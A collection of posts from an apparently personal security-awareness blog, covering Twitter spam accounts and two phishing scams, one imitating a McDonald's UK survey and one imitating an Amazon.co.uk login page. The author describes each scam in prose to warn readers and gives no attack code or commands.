MoMusings

I’ve no idea how many of you out there in blog-land use Twitter, but I’d guess quite a few of you do?

As a relatively new Twitter user, I’ve not seen much of the problems that Twitter has experienced over the last year, including account hacking, phishing, 419 scams, worms and other malcode problems. One area that seems (at least to me) to have been rather quiet has been spam via Twitter.

Until the last week or so, I’ve never received any. I’d be interested to know how many of you out there in blog-land who use Twitter have seen similar things to what I’m about to discuss.

I don’t think there is a specific name for Twitter spam, so I’ve coined one; Twam.

I’m sure the more creative of you out there can come up with something better?

Let’s have a look at a couple of examples I’ve seen in the last week or so:

1. The Vote For Me Twam
I received the following notification and when I checked out the profile for that user all their tweets were requests to vote for them in some beauty pageant.

As you can see at the time I was sent this they had a fair few followers and were following (Twamming) lots of other Twitter users. when I checked this particular account again this morning, it was still active and still only begging for you to vote for her at 60P per text no less! The number of followers now stands at 343 and she is following (Twamming) 1,986 other Twitter users.

2. The Porn Advertising Twam
I received the following notification just this morning and when I checked out the profile for that user they only have one tweet with a link to a porn site! So.they seem to be using Twitter to advertise their porn site.

Shortly after receiving the above notification, I received another using the same name, but from a different Twitter account. Their feed was exactly the same as the first one I received just 30 minutes earlier.

When I just checked both of these accounts (before publishing this) that were advertising a porn website they have now been closed by Twitter.

Needless to say I have blocked these Twitter accounts, as I don’t want to see what they offer and I don’t want to give them any credibility by being seen as being followed by them.

I wonder if this is the start of a major spam (twam) attack on this social networking site? I wouldn’t be surprised as this fate has already befallen FaceBook, Myspace and many other similar sites.

For those of you who are interested in following me on Twitter (no not you spammers/twammers) you can easily find me via my name or my Twitter account which is talkytoaster.

If you spot anything interesting feel free to send me a Tweet or a Direct message.

Take care and happy Tweeting.

I’d like to start this post with an apology [yes, again] as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won’t be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here’s a new one I’ve not seen before, the following e-mail arrived in my ‘Phish‘ inbox late last night [screenshot below]:

That’s nice if I answer just seven questions in a simple survey I will get £25…..I smell a phish, so what do we see when I click on the link?

Hmmmmm…..looks pretty good, quite believable wouldn’t you say?

So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the survey and then click on submit. This is where I’m taken too next:

Aha…..Just as I suspected, this is a phish, as it wants personal data and my credit card data, including the CVV so that the promised £25 can be credited to my card, yeah right. So, let me enter in some more bogus data and click on the Submit button again.

I particularly like the mis-use of the MasterCard SecureCode,VeriSign and Verified by Visa logos, just trying to make you feel secure, how reassuring, eh?

The final page [shown above]informs me that my data has been entered correctly [yeah right!] and that I should see my £25 credit payment on my credit card within 3-5 businees days. More like my credit card will be misused or sold on to others to misuse within 3-5 businees days! Oh, and then I get taken to the real McDonalds UK website, nice

So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this Phishing attempt is that this is the first time I’ve seen one targeting McDonalds in the UK.

So, if you are an McDonald’s customer, or think that you’d like £25 for free, be on your guard as it seems that the phishers are now spending significant amounts of their time to finely target their potential victims and try and get you to disclose your details….

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!

How many of you out there use Amazon’s Marketplace to sell items?

Well, if you do then this posting should be of some interest and I’d also be interested in how many of you have received similar emails to the one shown in the screenshot below:

Looks like a typical notification from Amazon that your item listed on Amazon Marketplace has been canceled; for those that use this Amazon service this usually happens when your item listing has expired, and is quite normal.

So, let me see where I end up when I click on the link contained in the e-mail; screenshot below:

Is this Amazon.co.uk? Looks genuine doesn’t it? would you sign-in via this page, or not?

For the moment, let us assume [quite rightly] that I’m suspicious of this page, let me have a look at the source HTML for the page above; I’m especially interested in the FORM section (the bit that deals with the login credentials; your e-mail address and Amazon.co.uk password). Here’s a screenshot of the related part of the HTML source for that function:

Hmmm…..notice anything odd?

Surely the real Amazon.co.uk doesn’t use a generic mailto CGI script [in this case a PERL script] to handle login routines, does it?

No, of course it doesn’t, the code in the screenshot above sends your now stolen Amazon.co.uk login details to the bad guys and girls via e-mail using the mailto.pl script hosted on http://www-cgi.paonline. It then goes onto send you to the real Amazon.co.uk page, sneaky huh?

So, this is another phishing scam, in this case they want to steal you Amazon login credentials, so that they can steal any personal details, including and stored credit-card data, or maybe they just want to buy things using your account, and have them sent to a drop-box to then be turned into cash. Such as ordering themselves a new MP3 player, phone, some CD’s or DVD’s or whatever, leaving you to pick up the bill and deal with the resulting mess.

Of course this type of attack is not just limited to Amazon, it would in theory work with any e-commerce site, so be careful out there especially where you have sites that store you credit-card details, as in most cases this is what the bad-guys and girls are after. If they can’t get that then they will just buy things from the site using your stored card data instead.

yet again, as with other recent examples I’ve blogged about it shows that phishers are not just interested in getting you bank details, they are just as happy to get e-commerce site credentials, game login credentials (such as WoW) or webmail account details (how many of you store e-mails which contain personal or financial  details?), amongst many others. Furthermore, do you you the same password for more than a single site? If you do then you are making it easier for the bad guys and girls to compromise your other accounts wherever they may be.